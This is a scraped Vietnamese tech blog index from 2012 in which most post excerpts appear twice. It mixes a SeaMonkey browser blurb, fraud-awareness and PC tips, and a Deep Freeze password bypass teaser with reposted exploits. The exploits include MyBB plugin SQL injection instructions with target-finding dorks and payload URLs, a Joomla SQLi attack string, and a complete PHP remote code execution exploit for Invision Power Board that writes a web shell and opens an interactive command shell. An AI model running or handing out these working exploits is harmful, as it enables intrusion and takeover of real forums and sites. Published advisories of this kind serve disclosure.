Sunday, November 4, 2012

SeaMonkey 2.12 Beta 3 - Trình duyệt web mã nguồn mở

SeaMonkey – là một bộ ứng dụng internet tất cả trong một: trình duyệt web theo tab, email chuyên dụng, nhóm thông tin, thảo luận ICR, và hiệu chỉnh HTML đơn giản.





SeaMonkey là một trình duyệt web có nguồn mở, được thiết kế theo chuẩn theo đúng ý, hiệu năng và di chuyển được.

SeaMonkey được xem là anh em của FireFox vì cùng được phát triển bởi Mozilla.


Tính năng chính

Navigator:

• Duyệt theo tab cho phép bạn các tốt nhất để dạo trên mạng. Bạn không còn phải mở từng trang nữa. Với các duyệt theo tab, bạn có thể mở nhiều trang cùng một lúc chỉ với một cú click. Hơn nữa, trang chủ của bạn có thể là nhiều trang trong những tab.
• Ngăn chặn Popup giúp bạn chuyệt web mà không bị gián đoạn bởi những quảng cáo phiền phức.
• Image Manager giúp bạn ngăn chặn các hình ảnh hoặc gở bỏ các hình ảnh phản cảm hoặc làm tăng tốc thể hiện các trang web.
• Tìm kiếm theo những gì bạn gõ vào cho phép bạn một cách khác để điều hướng trang. Chỉ cần bắt đầu gõ để nhảy từ link này sang link kia hoặc tìm kiếm 1 từ hoặc một ngữ trong trang.
• Bổ sung tất cả các tính năng của một trình duyệt hiện đại cần có bao gồm: Các thiết lập bảo mật chuyên sâu; Password, Download, và quản lý Cookie; Themes; hỗ trợ đa ngôn ngữ và đa nền tảng; và các tiêu chuyển mới nhất về web.


Mail & Newsgroups:

• Kiểm soát Junk mail giúp bạn kiểm soát email của bạn khỏi thư rác. Công cụ kiểm soát thư rác thích ứng của SeaMonkey được sử dụng thông minh hơn và được cá nhân hóa các email mà bạn nhận.
• Quản lý mail của bạn Labels và Mail Views tùy chỉnh. Mã hóa màu email của bạn để giúp bạn đặt quyền ưu tiên cho email. Sắp xếp mail của bạn với chức năng xem để giúp bạn duyệt qua email của bạn nhanh hơn.
• Hỗ trợ Multiple Accounts giúp bạn quản lý tất cả các mail qua một giao diện.
• SeaMonkey Messenger bao gồm các tính năng như S/MIME, trả lại báo cáo, Address Books, hỗ trợ LDAP, và chữ ký điện tử.


Composer:

• Trình chỉnh sửa HTML mạnh mẽ của SeaMonkey trở nên tốt hơn với hình ảnh sống động, định lại kích cỡ bảng biểu, chèn và xóa nhanh các ô trong bảng biểu, hỗ trợ CSS và các layer định vị. Composer là tất cả những gì bạn cần cho công việc soạn thảo và website của bạn.


Trang chủ

MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection

Bug cho forum sài MyBB với cái Albums plugin version 0.9
Tut:
1. Tạo cái user trên forum victim.
2. Tạo cái Album rồi upload hình lên.
-> 2 bước trên để có được cái ID user và ID của album sử dụng cho bước thứ 3.
READ MORE »

MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection

Bug cho forum sài MyBB với cái Albums plugin version 0.9
Tut:
1. Tạo cái user trên forum victim.
2. Tạo cái Album rồi upload hình lên.
-> 2 bước trên để có được cái ID user và ID của album sử dụng cho bước thứ 3.
READ MORE »

MyBB Follower User Plugin SQL Injection


# Exploit Title: Follower User MyBB plugin SQL Injection 0day
# Google Dork: intext:"Users subscribed to" inurl:member.php -site:fwcombie.us
# Date: 13.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/suscriber-user
# Version: 1.5+
# Tested on: Linux.
----------------------------------------------

The vulnerabillity exist within SuscribeUsers.php on SuscribeUsers_add():

$usid = $mybb->input[usid]; //Line 671
$uid = $mybb->input[uid]; //Line 672
if(user_awaiting($uid,$usid)) //Line 781
{ //Line 782
redirect("member.php?action=profile&uid=".$usid."# suscriberuser", $lang->double_suscription_awaiting,$lang->suscriberuser); // Line 783
} //Line 784
?>


----------------------------------------------

Instructions:
1. Create a new account on the target site.
2. Check your User ID by entering your profile link and write it down.
3. Enter here and start to inject your code:

/misc.php?suscriberuser=yes&usid='[SQLi]--+-&uid=[Your_User_ID]

----------------------------------------------

Demo:
http://server/misc.php?suscriberuser=yes&usid=' or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0)--+-2&uid=[your_uid]
Image : http://i.imgur.com/eGhzJ.png


Follow: https://twitter.com/PonyBlaze


Shotouts goes to FillySec.

MyBB Follower User Plugin SQL Injection


# Exploit Title: Follower User MyBB plugin SQL Injection 0day
# Google Dork: intext:"Users subscribed to" inurl:member.php -site:fwcombie.us
# Date: 13.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/suscriber-user
# Version: 1.5+
# Tested on: Linux.
----------------------------------------------

The vulnerabillity exist within SuscribeUsers.php on SuscribeUsers_add():

$usid = $mybb->input[usid]; //Line 671
$uid = $mybb->input[uid]; //Line 672
if(user_awaiting($uid,$usid)) //Line 781
{ //Line 782
redirect("member.php?action=profile&uid=".$usid."# suscriberuser", $lang->double_suscription_awaiting,$lang->suscriberuser); // Line 783
} //Line 784
?>


----------------------------------------------

Instructions:
1. Create a new account on the target site.
2. Check your User ID by entering your profile link and write it down.
3. Enter here and start to inject your code:

/misc.php?suscriberuser=yes&usid='[SQLi]--+-&uid=[Your_User_ID]

----------------------------------------------

Demo:
http://server/misc.php?suscriberuser=yes&usid=' or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0)--+-2&uid=[your_uid]
Image : http://i.imgur.com/eGhzJ.png


Follow: https://twitter.com/PonyBlaze


Shotouts goes to FillySec.

Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution


<?php

/*
----------------------------------------------------------------
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
----------------------------------------------------------------

author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: http://www.invisionpower.com/

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php

4015. static public function get($name)
4016. {
4017. // Check internal data first
4018. if ( isset( self::$_cookiesSet[ $name ] ) )
4019. {
4020. return self::$_cookiesSet[ $name ];
4021. }
4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
4023. {
4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
4025.
4026. if ( substr( $_value, 0, 2 ) == 'a:' )
4027. {
4028. return unserialize( stripslashes( urldecode( $_value ) ) );
4029. }

The vulnerability is caused due to this method unserialize user input passed through cookies without a proper
sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts
with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a
serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code
via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug
info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this
reason successful exploitation of this vulnerability requires short_open_tag to be enabled.

[-] Disclosure timeline:

[21/10/2012] - Vulnerability discovered
[23/10/2012] - Vendor notified
[25/10/2012] - Patch released: http://community.invisionpower.com/t...ecurity-update
[25/10/2012] - CVE number requested
[29/10/2012] - Assigned CVE-2012-5692
[31/10/2012] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);

function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}

print "\n+---------------------------------------------------------------------+";
print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}

list($host, $path) = array($argv[1], $argv[2]);

$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';

class db_driver_mysql
{
public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}

$payload = urlencode(serialize(array(new db_driver_mysql)));
$phpcode = '<?error_reporting(0);print(___);passthru(base64_d ecode($_SERVER[HTTP_CMD]));die;?>';

$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";

http_send($host, $packet);

$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");

while(1)
{
print "\nipb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution


<?php

/*
----------------------------------------------------------------
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
----------------------------------------------------------------

author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: http://www.invisionpower.com/

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php

4015. static public function get($name)
4016. {
4017. // Check internal data first
4018. if ( isset( self::$_cookiesSet[ $name ] ) )
4019. {
4020. return self::$_cookiesSet[ $name ];
4021. }
4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
4023. {
4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
4025.
4026. if ( substr( $_value, 0, 2 ) == 'a:' )
4027. {
4028. return unserialize( stripslashes( urldecode( $_value ) ) );
4029. }

The vulnerability is caused due to this method unserialize user input passed through cookies without a proper
sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts
with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a
serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code
via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug
info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this
reason successful exploitation of this vulnerability requires short_open_tag to be enabled.

[-] Disclosure timeline:

[21/10/2012] - Vulnerability discovered
[23/10/2012] - Vendor notified
[25/10/2012] - Patch released: http://community.invisionpower.com/t...ecurity-update
[25/10/2012] - CVE number requested
[29/10/2012] - Assigned CVE-2012-5692
[31/10/2012] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);

function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}

print "\n+---------------------------------------------------------------------+";
print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}

list($host, $path) = array($argv[1], $argv[2]);

$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';

class db_driver_mysql
{
public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}

$payload = urlencode(serialize(array(new db_driver_mysql)));
$phpcode = '<?error_reporting(0);print(___);passthru(base64_d ecode($_SERVER[HTTP_CMD]));die;?>';

$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";

http_send($host, $packet);

$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");

while(1)
{
print "\nipb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

Joomla Spider Catalog (index.php, product_id parameter) SQL Injection Vulnerability

1 ######################################### 1
0 I'm D4NB4R member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#Exploit Title: Joomla com_spidercatalog SQL injection Vulnerability

Dork: inurl:index.php?option=com_spidercatalog

Date: [31-10-2012]

Author: Daniel Barragan "D4NB4R"

Twitter: @D4NB4R

Vendor: http://www.web-dorado.com/

Demo: http://www.web-dorado.com/products/joomla-catalog.html

Version: 1.1 (last update on Sep 25, 2012)

License: GPLv2 or later Commercial

Tested on: [Linux(Arch)-Windows(7ultimate)]


Descripcion:

Spider Catalog for Joomla! is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes it easier for the customers to search and identify the needed products within the catalog. It is possible to add an unlimited number of parameters for each of the categories in the catalog in order to allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can be accompanied with an image. Customers are provided with the possibility of rating the products available on the catalog, as well as writing customer reviews that will appear under the catalog products. Spider Catalog provides you with a high level of customization concerning almost all the aspects of the catalog, ranging from background colors and text size inside the product cell to the number of products in the row and the number of customer reviews per catalog page.


Vulnerable Parameter Name:

product_id

Parameter Type:

Querystring


Attack Pattern:

-{Valid id}%27%20or%201%3d1%2b%28select%201%20and%20row%28 1%2c1%29%3E%28select%20count%28*%29%2cconcat%28CON CAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D, 0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20fro m%20%28select%201%20union%20select%202%29a%20group %20by%20x%20limit%201%29%29%2b%27&view=showproduct &page_num=1&back=1



Exploit Demo:

SQLi : SQL injection

http://localhost/index.php?option=co...e_num=1&back=1



Greetz: All Member Inj3ct0r Team * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha
* shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic
* Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel
* L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects
* aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe
* ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te


__________________________________________________ ___
Daniel Barragan "D4NB4R" 2012

[Hướng dẫn] Tự động cài đặt âm thầm nhiều phần mềm chạy cùng 1 lúc với 1 cú click chuột

Sau khi cài windows xong, sau đó cài từng phần mềm của mình hay dùng và ngồi nhấn YES/NEXT. Như vậy thật quả mất quá nhiều thời gian cài phần mềm

Nay WhatLove xin chia sẽ cho mọi người Cài âm thầm cho nhiều phần mềm cùng 1 lúc với 1 cú click chuột. Với phương pháp này các bạn phải thực hiện 1 giai doạn phức tạp. Tuy phức tạp nhưng khi mang đi cài đỡ phải mất công ngồi nhấn Yes/Next/Fisnd.
READ MORE »

[Hướng dẫn] Tự động cài đặt âm thầm nhiều phần mềm chạy cùng 1 lúc với 1 cú click chuột

Sau khi cài windows xong, sau đó cài từng phần mềm của mình hay dùng và ngồi nhấn YES/NEXT. Như vậy thật quả mất quá nhiều thời gian cài phần mềm

Nay WhatLove xin chia sẽ cho mọi người Cài âm thầm cho nhiều phần mềm cùng 1 lúc với 1 cú click chuột. Với phương pháp này các bạn phải thực hiện 1 giai doạn phức tạp. Tuy phức tạp nhưng khi mang đi cài đỡ phải mất công ngồi nhấn Yes/Next/Fisnd.
READ MORE »

Một số lời khuyên đơn giản cho việc bảo vệ máy tính

1. Không sử dụng các keygen, các phần mềm crack, vì đó là nơi virus thường ẩn náu.
2. Luôn cập nhật Windows của bạn (cập nhật các phần mềm, bản sửa lỗi bảo mật, bản vá lỗi, gói dịch vụ của Windows).
3. Sao lưu dữ liệu quan trọng của bạn thường xuyên. Có thể bỏ dữ liệu quan trọng vào USB, CD hoặc đưa lên MediaFire,…
READ MORE »

Một số lời khuyên đơn giản cho việc bảo vệ máy tính

1. Không sử dụng các keygen, các phần mềm crack, vì đó là nơi virus thường ẩn náu.
2. Luôn cập nhật Windows của bạn (cập nhật các phần mềm, bản sửa lỗi bảo mật, bản vá lỗi, gói dịch vụ của Windows).
3. Sao lưu dữ liệu quan trọng của bạn thường xuyên. Có thể bỏ dữ liệu quan trọng vào USB, CD hoặc đưa lên MediaFire,…
READ MORE »

Thêm cách vượt rào Deep Freeze (Mọi phiên bản)

Khi cài DF lên máy, thường tạo một file tên Persi0.sys (hoặc $Persi0.sys). File này lưu thông tin về mật khẩu, cấu hình DF và được bảo vệ trong môi trường Window thực.

Ý tưởng là thay thế file Persi0.sys (ở máy cài DF, có đặt mật khẩu bảo vệ) bởi file Persi0.sys (do mình tạo, chưa đặt mật khẩu). Hai file này được tạo cùng một phiên bản DeepFreeze.

READ MORE »

Thêm cách vượt rào Deep Freeze (Mọi phiên bản)

Khi cài DF lên máy, thường tạo một file tên Persi0.sys (hoặc $Persi0.sys). File này lưu thông tin về mật khẩu, cấu hình DF và được bảo vệ trong môi trường Window thực.

Ý tưởng là thay thế file Persi0.sys (ở máy cài DF, có đặt mật khẩu bảo vệ) bởi file Persi0.sys (do mình tạo, chưa đặt mật khẩu). Hai file này được tạo cùng một phiên bản DeepFreeze.

READ MORE »

Mở băng DeepFreeze bằng tay

Với 1 máy đã được cài DeepFreeze. Nếu ở chế độ mở băng ta có thể thay đổi bình thường, gỡ bỏ chương trình... Với chế độ đóng băng ta không thể làm gì được. Chương trình DeepFreeze khởi động 1 Driver tên DeepFrz để đóng băng, muốn vô hiệu hóa đóng băng ta sẽ phải tiến hành vô hiệu hóa Driver đó từ HĐH khác.

READ MORE »

Tích hợp Norton Ghost 11.5.1 vào Windows (Kể cả Windows 7)

Như các bạn đã biết, với sản phẩm "Tích hợp Hiren's Boot On HDD" của mình, đã k ít bạn cảm thấy như mọi việc liên quan đến sửa chữa PC đc đơn giản hơn với những trường hợp k thể Boot bằng CD hoặc USB Hiren's Boot 1 cách thông thường.

READ MORE »

Tích hợp Norton Ghost 11.5.1 vào Windows (Kể cả Windows 7)

Như các bạn đã biết, với sản phẩm "Tích hợp Hiren's Boot On HDD" của mình, đã k ít bạn cảm thấy như mọi việc liên quan đến sửa chữa PC đc đơn giản hơn với những trường hợp k thể Boot bằng CD hoặc USB Hiren's Boot 1 cách thông thường.

READ MORE »

Công cụ kiểm tra từ khóa cho WebMaster trong SEO

Bạn là admin của một website bạn rất quan tâm đến đến lượng truy cập cũng như lượng từ khóa top của mình và công cụ seo web sẽ giúp bạn

Nếu bạn chỉ đơn thuần vào Google, gõ từ khóa, và xem site của mình thứ hạng bao nhiêu thì chắc chắn rằng không chuẩn, việc này là do khi truy cập Google, trình duyệt sẽ lưu lại lịch sử duyệt web của bạn, thậm trí Google sẽ ghi nhớ các thói quen của bạn, các lĩnh vực bạn hay xem, các từ khóa bạn hay search, các website bạn hay vào.
READ MORE »

Cách thay đổi màn hình đăng nhập cho mọi Windows

1. TuneUp ngoài việc tăng tốc hệ thống nó còn làm được rất nhiều việc và đây là 1 trường hợp ví dụ.
- Chúng ta sử dụng TuneUp nhé, bản nào cũng được. Tôi đang sử dụng bản 2012.
- Cách thực hiện như sau:

READ MORE »

Cách thay đổi màn hình đăng nhập cho mọi Windows

1. TuneUp ngoài việc tăng tốc hệ thống nó còn làm được rất nhiều việc và đây là 1 trường hợp ví dụ.
- Chúng ta sử dụng TuneUp nhé, bản nào cũng được. Tôi đang sử dụng bản 2012.
- Cách thực hiện như sau:

READ MORE »

Tội phạm lừa đảo - Phần III: Lừa đảo trực tuyến

Một ngày như mọi ngày khác, bạn check email và nhận được 1 message từ phía ngân hàng. Không như những email bình thường, đây là lá thư yêu cầu bạn reply ngay lập tức, nếu không, tài khoản của bạn sẽ bị khóa. Bạn sẽ làm gì?

READ MORE »

Tội phạm lừa đảo - Phần III: Lừa đảo trực tuyến

Một ngày như mọi ngày khác, bạn check email và nhận được 1 message từ phía ngân hàng. Không như những email bình thường, đây là lá thư yêu cầu bạn reply ngay lập tức, nếu không, tài khoản của bạn sẽ bị khóa. Bạn sẽ làm gì?

READ MORE »

Tội phạm lừa đảo - Phần II: Kinh doanh đa cấp

Hình thức kinh doanh Bán hàng đa cấp rất phổ biến trên thế giới và trong một vài năm trở lại đây cũng đã bắt đầu xuất hiện với tần suất ngày càng cao ở Việt Nam. Nhưng so với các hình thức kinh doanh khác thì Bán hàng đa cấp khá tai tiếng và đem lại nhiều rủi ro cho các thành viên tham gia. Với nhiều người thì họ nói thẳng quan điểm của mình rằng hình thức bán hàng đa cấp chỉ là một hình thức lừa đảo không hơn không kém. Liệu những chiêu trò lừa đảo này thực sự là bán hàng đa cấp hay là một hình thức khác ??? Thực hư ra sao ?

READ MORE »

Tội phạm lừa đảo - Phần II: Kinh doanh đa cấp

Hình thức kinh doanh Bán hàng đa cấp rất phổ biến trên thế giới và trong một vài năm trở lại đây cũng đã bắt đầu xuất hiện với tần suất ngày càng cao ở Việt Nam. Nhưng so với các hình thức kinh doanh khác thì Bán hàng đa cấp khá tai tiếng và đem lại nhiều rủi ro cho các thành viên tham gia. Với nhiều người thì họ nói thẳng quan điểm của mình rằng hình thức bán hàng đa cấp chỉ là một hình thức lừa đảo không hơn không kém. Liệu những chiêu trò lừa đảo này thực sự là bán hàng đa cấp hay là một hình thức khác ??? Thực hư ra sao ?

READ MORE »

Tội phạm lừa đảo - Phần I: Nghệ thuật lừa đảo

Dối trá có thể khiến cuộc sống của bạn trở nên dễ dàng hơn: Công việc suôn sẻ hơn khi bạn dối trá với khách hàng, đồng nghiệp và sếp. Gia đình êm ấm hơn khi bạn dối trá với vợ con. Nhưng khi kỹ năng dối trá của bạn đã đạt đến tầm chuyên nghiệp, chào mừng bạn đến với thế giới của những tay lừa đảo.

READ MORE »

Tội phạm lừa đảo - Phần I: Nghệ thuật lừa đảo

Dối trá có thể khiến cuộc sống của bạn trở nên dễ dàng hơn: Công việc suôn sẻ hơn khi bạn dối trá với khách hàng, đồng nghiệp và sếp. Gia đình êm ấm hơn khi bạn dối trá với vợ con. Nhưng khi kỹ năng dối trá của bạn đã đạt đến tầm chuyên nghiệp, chào mừng bạn đến với thế giới của những tay lừa đảo.

READ MORE »